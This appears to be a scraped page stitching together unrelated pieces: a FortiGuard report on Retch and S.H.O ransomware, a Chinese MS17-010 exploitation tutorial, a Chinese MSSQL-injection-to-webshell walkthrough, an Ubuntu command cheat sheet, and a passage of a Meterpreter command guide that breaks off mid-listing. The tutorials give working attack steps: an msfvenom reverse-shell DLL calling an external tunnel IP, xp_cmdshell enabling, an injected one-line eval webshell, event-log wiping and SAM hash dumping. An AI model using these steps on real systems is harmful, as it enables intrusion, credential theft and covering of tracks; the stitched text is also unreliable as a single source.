ISHACK AI BOT

FortiGuard实验室每两周收集一次感兴趣的勒索软件变体的数据，并发布有关报告，旨在让读者了解不断发展的勒索软件形势以及抵御这些变体的缓解措施，本文要讲的是Retch和S.H.O勒索软件。 受影响的平台：Microsoft Windows； 受影响方：Microsoft Windows用户； 影响：加密和泄露受害者的文件，并要求赎金解密文件； 严重性级别：高； Retch勒索软件概述 Retch是2023年8月中旬首次发现的一种新的勒索软件变体，它在受攻击设备上加密文件，并留下两张勒索信，要求受害者支付赎金来解密文件。 攻击媒介 虽然目前无法获得有关Retch勒索软件攻击者使用的攻击媒介的信息，但是它可能与已知其他勒索软件组织有显著关联。 目前，来自以下国家的Retch勒索软件样本已提交给公共文件扫描服务: 美国 伊朗 德国 俄罗斯 法国 哥伦比亚 韩国 意大利 一旦勒索软件运行，它就会查找并加密具有以下文件扩展名的文件： 以下目录不支持文件加密： "Windows" "Program Files" "Program Files (x86)" 勒索软件为加密文件添加了“.Retch”扩展名。 由Retch勒索软件加密的文件 然后，它会在每个加密文件的文件夹中放上一条标记为“Message.txt”的勒索信。 Retch勒索软件释放的勒索信 在勒索信中，攻击者要求受害者支付价值300欧元的比特币来解密文件，由于赎金要求较低，Retch勒索软件的攻击目标很可能是一般消费者而不是企业。如下图所示，赎金信息有法语和英语两种版本，这使我们相信Retch勒索软件主要针对法国用户。然而，进一步的调查显示，情况并非如此。 研究人员还发现，放在桌面上的勒索信与“Message.txt”不同。留在桌面上的勒索信标有 “HOW TO RECOVER YOUR FILES.txt”，并要求受害者支付价值1000美元的比特币进行文件解密。这份勒索信有一个不同的联系电子邮件地址，其中包括攻击者的比特币钱包地址。 Retch勒索软件在桌面上留下的勒索信标有 “HOW TO RECOVER YOUR FILES.txt” 事实证明，Retch勒索软件是基于一个公开的勒索软件源代码开发的，该源代码声称用于教育目的，似乎是基于一款著名的开源勒索软件“HiddenTear”。默认情况下，开源勒索软件的勒索信如下图所示，攻击者似乎只在桌面上定制了只有英文的勒索信，而其他所有位置的勒索信都没有受到影响，这表明Retch勒索软件并没有像最初想象的那样针对法国用户。如上所述，向公共文件扫描服务提交文件的国家很普遍，这进一步表明研究人员的怀疑是正确的。 在我们进行调查时，攻击者的比特币钱包没有记录任何交易。 S.H.O勒索软件概述 攻击媒介 目前还没有关于S.H.O勒索软件攻击者使用的攻击媒介的信息，不过，它可能与已知其他勒索软件组织有显著关联。 S.H.O勒索软件样本已提交给以下国家的公共文件扫描服务： 美国； 加拿大； 勒索软件执行 勒索软件运行后，会对受攻击设备上的文件进行加密，并添加五个随机字母和数字作为文件扩展名。 S.H.O勒索软件加密的文件 S.H.O尝试使用以下扩展名加密文件： 以下文件被排除在所有目录外： 排除加密的文件列表 这些目录也被排除在加密内容之外： 排除加密的目录列表 S.H.O使用RSA公钥和Microsoft“Rijndael Managed”C#库对每个文件进行加密。 文件加密例程 在完成加密后，它会用自己的壁纸替换桌面壁纸，要求受害者找到并阅读文件“readme.txt”，这是一封勒索信。 被S.H.O勒索软件取代的壁纸 FortiGuard实验室发现了两种S.H.O勒索软件变体，它们留下了不同的勒索信，尽管勒索信上有属于攻击者的不同比特币地址，但赎金费用始终保持在200美元。 S.H.O勒索软件变体留下的勒索信 另一个S.H.O勒索软件变体留下的勒索信 赎金信息恐吓受害者支付赎金，在调查时，这两个比特币钱包都不可用。 Fortinet客户已经通过其AntiVirus和FortiEDR服务受到保护，免受这些恶意软件变体的影响，如下所示： FortiGuard实验室检测到具有以下杀毒软件签名的Retch勒索软件样本： 1.MSIL/Filecoder.AK!tr.ransom： FortiGuard实验室检测的S.H.O勒索软件样本具有以下反病毒签名。 2.MSIL/Filecoder.APU!tr.ransom：FortiGuard防病毒服务包括FortiGate、FortiMail、forticclient和FortiEDR。运行当前防病毒更新的Fortinet EPP客户也受到保护。 IOC 缓解措施 1.由于易受干扰、日常运营受攻击、对组织声誉的潜在影响，以及个人身份信息（PII）的不必要破坏或发布等，保持所有AV和IPS签名的最新性至关重要。 2.由于大多数勒索软件都是通过网络钓鱼传播的，组织应考虑利用Fortinet解决方案来培训用户了解和检测网络钓鱼威胁。 3.FortiFish网络钓鱼模拟服务使用真实世界的模拟来帮助组织测试用户对网络钓鱼威胁的意识和警惕性，并在用户遇到有针对性的网络钓鱼攻击时培训和加强正确的做法。 4.增加内部培训，帮助最终用户学习如何识别和保护自己免受各种类型的网络钓鱼攻击，并可以轻松添加到内部培训计划中。 5.组织需要对数据备份的频率、位置和安全性进行根本性的更改，以有效应对勒索软件不断演变和迅速扩大的风险。再加上数字供应链的攻击和员工远程办公进入网络，攻击可能来自任何地方，这是一个真正的风险。 6.基于云的安全解决方案，如SASE，用于保护离网设备，高级终端安全，如EDR（终端检测和响应）解决方案，可以在攻击中期中断恶意软件，以及零信任访问和基于策略和上下文限制，对应用程序和资源的访问的网络分段策略，都应该进行调查，以最大限度地降低风险并减少成功勒索软件攻击的影响。 作为业界领先的完全集成安全结构的一部分，Fortinet还提供了广泛的技术和基于人工的即服务产品组合，为你的安全生态系统提供本地协同和自动化。 7.CISA、NCSC、FBI和HHS等组织警告勒索软件受害者不要支付赎金，部分原因是赎金并不能保证文件会被找回。

0x00 前言 本文主要介绍一下MSF模块的下载、使用，以及当攻击机处于内网，而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下，并没有新的知识点，可以为刚入门的新手抛砖引玉，提供一条解决问题的思路，同时也记录一下过程，加强记忆。 主要分为两个知识点，一是SMB漏洞的批量检测，二是内网穿透技术。 首先是环境的搭建，具体如下表所示： 主机IP备注 Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6，下载有方程式利用工具包（主要为Windows目录下的工具） Window2008 R2 64位 10.50.2.62 靶机，存在MS17-010漏洞，并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块，所以要去exploit-db下载，并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb 启动Metasploit，模块会自动加载，或者使用命令reload_all重新加载所有模块。 2.漏洞扫描的使用方法 选择使用smb_ms_17_010模块，并查看使用命令。 msf > use auxiliary/scanner/smb/smb_ms_17_010 msf auxiliary(smb_ms_17_010) > show options 所必须的参数有三个，对于无需登录的SMB，我们只需设置一下扫描的IP段、线程并运行即可开始扫描。 msf auxiliary(smb_ms_17_010) > set RHOSTS 10.50.2.1-255 RHOSTS => 10.50.2.1-255 msf auxiliary(smb_ms_17_010) > set THREADS 10 THREADS => 10 msf auxiliary(smb_ms_17_010) > run 出现黄色警告的表示可能存在，需要进一步验证。 为了方便将存在漏洞的IP列出来，写了一个简单的Python脚本。 import re if __name__ == '__main__': f = open("smb.txt", mode='r', buffering=1) while(True): line = f.readline() if line : if "likely" in line: print line.split(' ')[1].split(':')[0] else: break 提取出的IP如下所示： ..... 10.50.2.52 10.50.2.62 10.50.2.65 10.50.2.61 10.50.2.63 10.50.2.64 10.50.2.76 10.50.2.69 10.50.2.77 10.50.2.78 10.50.2.79 .... 0x02 内网穿透 有了存在漏洞的地址，接下来将开始对其进行验证，以10.50.2.62为例。 由于Kali在虚拟机，宿主机IP为2.0..，目标机在10.50.2.*。相当于需要从内网到另一个内网， 选择采用了ngrok进行tcp的端口转发来实现内网的穿透。 这里采用了www.ngrok.cc平台进行演示，类似这样的平台有很多，例如natapp.cn等。 注册并开通隧道，如图所示。 下载对应的客户端，下载地址为：https://www.ngrok.cc/#down-client ，选择与系统对应的软件。 我这里Kali为64位的，下载和使用命令如下： root@kali:~/Downloads# wget hls.ctopus.com/sunny/linux_amd64.zip root@kali:~/Downloads# unzip linux_amd64.zip root@kali:~/Downloads# cd linux_amd64/ root@kali:~/Downloads/linux_amd64# ls root@kali:~/Downloads/linux_amd64# ./sunny clientid 隧道ID 使用如下命令生成用于监听的dll文件。监听的IP为server.ngrok.cc的地址，端口为开通隧道时填写的远程端口。 出现下图的界面表示运行成功。 root@kali:~/Documents# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=6266 -f dll > got.dll 然后在Kali上设置监听本机的IP和端口，也就是在开通隧道时填写的本地端口。 use exploit/multi/handler set LHOST 192.168.232.134 set LPORT 5555 set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > exploit 由于关于Eternalblue利用方法有很多教程了，这里就不详细说明了，如图所示。 攻击成功时查看ngrok客户端发现有一个连接。 而且Kali上也生成了一个meterpreter会话。 之后的操作就很简单了，可以添加用户等等。 最后远程登录成功如下图所示。 使用natapp也是可以的。 0x03 总结 本文主要以MS17-010为例，讲解了如何下载和利用Metasploit中没有的模块，以及如何解决内网到内网的穿透的问题，当然解决的方法还有很多，这里就不再介绍了。 没有什么新的知识，怕忘记所以记录一下~~ 0x04 参考 [1]https://www.exploit-db.com/exploits/41891/ [2]http://bobao.360.cn/learning/detail/3041.html

前言 本文主要通过一个案例来演示一下当MSSQL是DBA权限，且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。 我测试的环境是在Win7 64位下，数据库是SQLServer 2000，IIS版本是7.5，程序是采用风讯的CMS。后台登录后有多处注入，因为这里是演示用注入获取WEBSHELL，因此就不考虑后台上传的情况了，只是用注入来实现。 过程 首先找到一个如下的注入点： http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;-- 通过SQLMAP可以查看到是DBA权限 创建临时表 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));-- 在WINDOWS下查找文件用如下命令： for /r 目录名:\ %i in (匹配模式) do @echo %i 例如在C盘下搜索NewsList.aspx，可以使用for /r c:\ %i in (Newslist*.aspx) do @echo %i或者for /r c:\ %i in (Newslist.aspx*) do @echo %i 使用for /r c:\ %i in (Newslist*.aspx) do @echo %i的搜索结果 一定要在匹配模式里面加上一个*号，不然搜索出来的是全部的目录，后面拼接了你搜索的内容。 使用for /r c:\ %i in (Newslist.aspx) do @echo %i的搜索结果 用xp_cmdshell执行查找文件的命令，并将搜索的结果插入到临时表中 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r c:\ %i in (Newslist*.aspx) do @echo %i ';-- 如果无法执行xp_cmdshell，并提示如下错误SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。 可以使用如下命令来启用xp_cmdshell ;EXEC sp_configure 'show advanced options',1;//允许修改高级参数 RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展 RECONFIGURE;-- 然后再次执行搜索命令。 在执行上述搜索和插入过程后，可以使用' and (select(*) from tt_tmp)>1页面返回是否正常来判断是否有搜索结果。当没有找到的话，select(*) from tt_tmp的结果为1，否则大于1。如果没有的话，就换目录，可以试试其他盘符，如';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r d:\ %i in (Newslist*.aspx) do @echo %i ';--。也可以使用sqlmap来查看条数。 可以用报错将表内容给显示出来 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp)and 'a'='a 继续爆 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp where tmp1 not in ('c:\inetpub\wwwroot\manage\news\NewsList.aspx '))and 'a'='a 也可以用sqlmap直接将表中数据读取出来 然后根据导出结果的路径来判断是否可能为WEB目录。然后写入一个测试文件，看是否可以访问来进一步证实结果。 这里在根目录写了一个txt文件，写别的目录怕因为没有权限而无法访问。 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo test >c:\\WWW\\2333.txt';-- 然后访问http://192.168.232.138:81/2333.txt 成功访问，然后就是写一句话 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;-- DOS命令将文件写入文本中时，遇到<>应在前面加上^。成功写入。然后就是进一步的操作了，这里就不概述了。 总结: 这里一共有三个小的知识点: 1.sa用户如何开启xp_cmdshell EXEC sp_configure 'show advanced options',1;//允许修改高级参数 RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展 RECONFIGURE; 2.Windows下利用dos如何搜索文件 for /r c:\ %i in (Newslist*.aspx) do @echo %i for /r c:\ %i in (Newslist.aspx*) do @echo %i 3.dos命令下写文件遇到<>如何处理 echo ^<^> > 123.txt 参考: [1]Windows命令行(cmd)下快速查找文件(类似Linux下find命令) [2]技术分享：MSSQL注入xp_cmdshell

一、文件/文件夹管理 ls #列出当前目录文件（不包括隐含文件） ls -a #列出当前目录文件（包括隐含文件） ls -l #列出当前目录下文件的详细信息 ls -al #列出当前详细目录文件和隐藏的文件信息 cd .. #回当前目录的上一级目录 cd ~ #回当前用户的宿主目录 cd 目录名 #改变当前目录 pwd #查看当前目录路径 mkdir test #创建一个空目录 rmdir test #删除一个空目录 rm -rf dir #删除所有含有目录和文件 rm filename #删除一个文件或多个文件 mv /lib/usr /opt/ #将文件移动相对路经下的文件到绝对路经下 mv /opt/test /home/test1 #将目标文件移动到新的文件目录下并重命名 mv newfile remfile #重文件命名 cp test test1 #拷贝文件 cp -r test/ test1/ #拷贝文件夹和文件到目标文件中 dpkg -L xxx #查看xxx默软件安装的内容 dpkg -i xxx.deb #安装deb文件 cat 文件名|more 文件名| less 文件名 #显示文件内容 touch test #建立一个空文件 二、系统管理 chown root home/ #把home目录的用户权限改成root用户 chmod 775 test/ #更改test目录权限为可读可写 chgrp root /home #把home目录的属性组改成root组 Useradd test #创建一个新的用户test Passwd test #为用户test创建密码 userdel test #删除一个账号test passwd -l test #暂时终止用户帐号test passwd -u 用户帐号名 #恢复被终止的账号test sudo passwd root #启用root账号并设置密码 su root # 切换到root账号 Groupadd 组名 #创建一个新的组 groupdel 用户组名 #删除一个组 service [servicename] start/stop/restart #系统服务控制操作 /etc/init.d/服务名 restart #临时重启一个服务 /etc/init.d/服务名 stop #临时关闭一个服务 /etc/init.d/服务名 start #临时启动一个服务 sudo update-rc.d 服务名 defaults 99 #添加一个服务 sudo update-rc.d 服务名 remove #删除一个服务 reboot|init 6|Ctrl+Alt+Del #重启LINUX系统 Halt |Init 0 |hutdown –h now #关闭LINUX系统 uname -a #查看内核版本以及是否是32或者64位系统 cat /etc/issue #查看ubuntu版本 lspci #查看PCI设备 lsusb #查看usb设备 cat /proc/cpuinfo #查看cpu信息 sudo /bin/hostname ubuntu #设置系统主机名，重启生效 ssh [email protected] #远程登录到ssh服务 ctrl+alt+t #快捷打开ubuntu的命令终端 chmod nnnn file n为0-7的数字，意义如下: 4000 运行时可改变UID 2000 运行时可改变GID 1000 置粘着位 0400 文件主可读 0200 文件主可写 0100 文件主可执行 0040 同组用户可读 0020 同组用户可写 0010 同组用户可执行 0004 其他用户可读 0002 其他用户可写 0001 其他用户可执行 nnnn 上列数字相加得到的 chmod 0777 file #是指将文件 file 存取权限置为所有用户可读可写可执行。 chmod +x .sh.sh #对文件sh.sh增加可执行权限 sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 lsmod #查看内核加载的模块 lshw #显示当前硬件信息 sync fuser -km /media/usbdisk #卸载U盘 sudo ntpdate time.nist.gov #同步服务器时间 env #查看系统环境变量 mount -o iocharset=x /dev/hdax /mnt/目录名 #支持中文名挂载 mount -t auto /dev/cdrom /mnt/cdrom #挂载光驱，这里如没有/mnt/cdrom，需要mkdir新建 umount /mnt/cdrom #解除挂载 umount -a #解除所有挂载' 三、打包/解压 tar 详细参数：-c 创建包 –x 释放包 -v 显示命令过程 –z 代表压缩包 tar –cvf benet.tar /home/benet #把/home/benet目录打包成tar格式 tar -xvf bener.tar #解压.tar包 tar –zxvf benet.tar.gz #解压.gz或者.tar格式文件 tar –jxvf benet.tar.bz2 #解压.bz2格式文件 bunzip2 文件.bz2 #解压.bz2格式文件 bzip2 待压缩文件 #压缩.bz2格式文件 uncompress 文件.z #解压.z文件 compress 文件 #压缩为.z文件 解压缩 RAR 文件： sudo apt-get install rar unrar #安装rar压缩、解压工具 sudo ln -f /usr/bin/rar /usr/bin/unrar #建立链接 unrar x aaaa.rar #解压rar文件 解压缩和打包 ZIP 文件： sudo apt-get install zip unzip #安装zip压缩、解压工具 sudo ln -f /usr/bin/zip /usr/bin/unzip #建立链接 unzip 文件.zip -d dir #解压zip到某个目录下 zip zipfile 待压缩文件列表 #压缩zip包 四、make编译 源代码包编译安装： 查阅README 基本用法 ： 1.配置：解压目录下 ./configure 2.编译：解压目录下 make 3.安装：解压目录下 make install sudo auto-apt run ./configure #编译时缺少h文件的自动处理 五、apt-get命令 sudo apt-get install package #安装包 sudo apt-get install package - - reinstall #重新安装包 sudo apt-get -f install #修复安装 sudo apt-get autoremove #删除系统不再使用的孤立软件 系统升级： sudo apt-get update #更新源 sudo apt-get upgrade #不含内核升级所有软件更新 sudo apt-get dist-upgrade #含内核升级 六、硬盘命令 fdisk -l #查看系统分区信息 hdparm -i /dev/hda #查看IDE硬盘信息 hdparm -I /dev/sda #查看STAT硬盘信息 df -h #查看硬盘剩余空间 du -hs /opt #查看目录占用空间 fdisk /dev/sd #为一块新的SCSI硬盘进行分区 七、内存命令 free -m #查看当前的内存使用情况 ps -A #查看当前有哪些进程 ps -aux #查看所有当前进程 ps -auxw #列出当前进程ID kill 进程号 #停止一个进程ID号，就是ps -A中的第一列的数字 killall 进程名 #停止一个进程，就是一个进程名 kill -9 进程号 #强制杀死一个进程 top #查看当前进程的实时状况 lsof -p 进程号 #查看 运行进程丢应调用的路径 八、网络命令 ifconfig #查看当前IP地址 lsof -i :80 #查看当前监听80端口的程序 netstat -antp #查看当前的TCP端口 netstat -ano #查看当前所有开放的端口 traceroute www.baudu.com #查看路由跟踪 立即让网络支持nat: sudo echo 1 > /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -I POSTROUTING -j MASQUERADE route -n #查看路由信息 sudo route add -net 192.168.0.0 netmask 255.255.255.0 gw 172.16.0.1 #手工增加一条动态路由 sudo route del -net 192.168.0.0 netmask 255.255.255.0 gw 172.16.0.1 #手工删除一条路由 修改网卡MAC地址的方法 sudo ifconfig eth0 down #关闭网卡 sudo ifconfig eth0 hw ether 00:AA:BB:CC:DD:EE #然后改地址 sudo ifconfig eth0 up #然后启动网卡 netstat -na|grep SYN #统计当前IP连接的个数 sudo dhclient eth0 #自动获取IP地址，前提网络中有DHCP服务 sudo ufw disable #关闭防火墙 ethtool eth0 #查看网卡状态 网卡配置静态IP地： sudo vi /etc/network/interfaces #编辑配置文件 并用下面的行来替换有关eth0的行: # The primary network interface auto eth0 iface eth0 inet static address 192.168.3.90 gateway 192.168.3.1 netmask 255.255.255.0 network 192.168.3.0 broadcast 192.168.3.255 sudo /etc/init.d/networking restart #网络重启生效 vim /etc/hosts #增加本机静态主机名查询 配置DNS: 编辑配置文件：vim /etc/resolv.conf 增加内容： search test.com #DNS的域 nameserver 192.168.3 #DNS服务器IP地址 九、文件 find -name “字符串” 或者文件名 #查找范围内满足字符串匹配的文件和目录 whereis filename #快速查找某个文件 find 目录 -name 文件名 #查找文件 locate 文件名 #查找文件 file filename/ #看文件类型 tail -n 6 xxx #显示xxx文件倒数6行的内容 grep -l -r xxx . #查找包含xxx字符串的文件 sudo ntpdate time.nist.gov #从服务器上同步时间 /var/lib/mysql #mysql的数据库存放在地方 /var/www #默认wwwroot 十、搭建LAMP服务器： 终端输入以下命令： sudo apt-get install apache2 mysql-server php5 php5-mysql php5-gd 修改 MySql 密码，终端下输入： mysql -u root mysql> GRANT ALL PRIVILEGES ON *.* TO root@localhost IDENTIFIED BY “123456″; ’123456‘是root的密码，可以自由设置，但最好是设个安全点的。 mysql> quit; #退出mysql apache2的操作命令 启动：#sudo /etc/init.d/apache2 start 重启：#sudo /etc/init.d/apache2 restart 关闭：#sudo /etc/init.d/apache2 stop apache2的默认主目录：/var/www/ 十一、常用软件安装 sudo apt-get install ubuntu-restricted-extras #安装解码器、flashplayer、java虚拟机、微软字体 FireFox 中安装 FlashPlayer 插件： 先下载插件: install_flash_player_9_linux.tar.gz tar -zxf install_flash_player_9_linux.tar.gz ./flashplayer-installer 回答(y/n/q)? n/q] sudo cp libflashplayer.so /usr/lib/firefox/plugins sudo apt-get install mplayer mozilla-mplayer totem-xine libxine-extracodecs #安装媒体播放器mplayer sudo apt-get install d4x amule azureus #安装下载工具（多线程下载、BT下载、电驴） sudo apt-get clean #apt下载的deb包清理,释放硬盘空间 安装VNC server: sudo apt-get install vnc4server #第一步, 获取安装文件 第二步, 修改VNC Password, 6-8位 vncpasswd Password: ****** Verify:***** 第三步, 修改配置 系统->首选项->远程桌面 选择->请求用户输入此密码->输入至少6位密码 第四步, 启动VNC server vncserver 第五步，通过客户端连接 vncviewer 192.168.0.1 十二、更改增加更新源 sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak #备份 sudo vim /etc/apt/sources.list #修改 阿里云源: deb http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe mult sudo apt-get update #更新列表 sudu apt-get upgrade 十三、系统以root账号登录 1. sudo passwd root //两次为root设置的密码 2. su root//使用su 可以切换root用户 3.apt-get install vim //安装vim编辑器 4. sudo vim /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf //编辑50-ubuntu.conf配置文件 5.在弹出的编辑框里输入：greeter-show-manual-login=true 保存关闭 注意： 如果重启出现“读取/root/.profile时发生错误 mesg:ttyname failed”，修复问题，编辑配置文件 vi /root/.profile 找到.profile文件中的“mesg n”，并将其替换成“tty -s && mesg n”。 然后再重启。 十四、开启ssh 1.ps -e | grep ssh //查看是否有ssh进程运行，如没有，则需要安装openssh 2.apt-get install openssh-server //安装openssh-server 3./etc/init.d/ssh restart //重启ssh服务 4.ps -e | grep ssh//重新查看ssh服务已经安装上 5. vim /etc/ssh/sshd_config //编辑sshd配置文件，修改下面： 将PermitRootLogin without-password用#注释， 添加一行，内容为： PermitRootLogin yes 6.然后reboot重启 十五、ubuntu下安装vmtools 1.点击vm的安装vmtools按钮 2.cd /media/backlion/vm-tools 3.cp vm-tools.gz /opt/ 4.cd /opt 5.tar zxvf vm-tools.gz 4. cd vmware-tools-distrib 5.chmod +x vmware-install.pl 6. ./vmware-install.pl -d 十六、vi编辑类 　　1.进入后为命令模式：（1）插入i；（2）打开0；（3）修改c；（4）取代r；（5）替换s 　　2.经（1）后进入全屏幕编辑模式。 　　3.命令模式-->编辑模式（a/i）；编辑模式-->命令模式（Esc）；命令模式-->末行模式（：）。 　　4.：w/w newfile保存 　　5.：q/q！退出iv；：wq保存退出 十七、权限设定 　　（1）chmod -a|u|g|o |-|=r|w|x 文件/目录名 　　其中：a--所有用户（all）；u--本用户（user）；g--用户组（group）；o--其他用户（other users） 　　--增加权限；---删除权限；=--设置权限 　　文件：r--只读权限（read）；w--写权限（write）；x--执行权限（execute） 　　目录：r--允许列目录下文件和子目录；w--允许生成和删除目录下文件；x--允许访问该目录 　　（2）chmod xxx 文件/目录名 　　其中：execute=1；write=2；read=4 　　x取值：0--没有任何权限（常用）；1--只能执行（不常见）；2--只能写（不常见）；3--只能写和执行

Using Meterpeter commands Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. help The ‘help‘ command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... background The ‘background‘ command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again. meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > cat The ‘cat‘ command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument. meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt What you talkin' about Willis meterpreter > cd & pwd The ‘cd‘ & ‘pwd‘ commands are used to change and display current working directly on the target host. The change directory “cd” works the same way as it does under DOS and *nix systems. By default, the current working folder is where the connection to your listener was initiated. ARGUMENTS: cd: Path of the folder to change to pwd: None required Example usuage: meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > clearev The ‘clearev‘ command will clear the Application, System and Security logs on a Window systems. There are no options or arguments. Before using Meterpreter to clear the logs | Metasploit Unleashed Example usage: Before meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... meterpreter > After using Meterpreter to clear the logs | Metasploit Unleashed After download The ‘download‘ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter > edit The ‘edit‘ command opens a file located on the target host. It uses the ‘vim’ so all the editor’s commands are available. Example usage: meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt Please refer to the “vim” editor documentation for more advance use. http://www.vim.org/ execute The ‘execute‘ command runs a command on the target. meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> getuid Running ‘getuid‘ will display the user that the Meterpreter server is running as on the host. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump The ‘hashdump‘ post module will dump the contents of the SAM database. meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: meterpreter > idletime Running ‘idletime‘ will display the number of seconds that the user at the remote machine has been idle. meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs meterpreter > ipconfig The ‘ipconfig‘ command displays the network interfaces and addresses on the remote machine. meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 meterpreter > lpwd & lcd The ‘lpwd‘ & ‘lcd‘ commands are used to display and change the local working directory respectively. When receiving a meterpreter shell, the local working directory is the location where one started the Metasploit console. Changing the working directory will give your meterpreter session access to files located in this folder. ARGUMENTS: lpwd: None required lcd: Destination folder Example usage: meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www meterpreter > ls As in Linux, the ‘ls‘ command will list the files in the current remote directory. meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip... migrate Using the ‘migrate‘ post module, you can migrate to another process on the victim. meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > ps The ‘ps‘ command displays a list of running processes on the target. meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 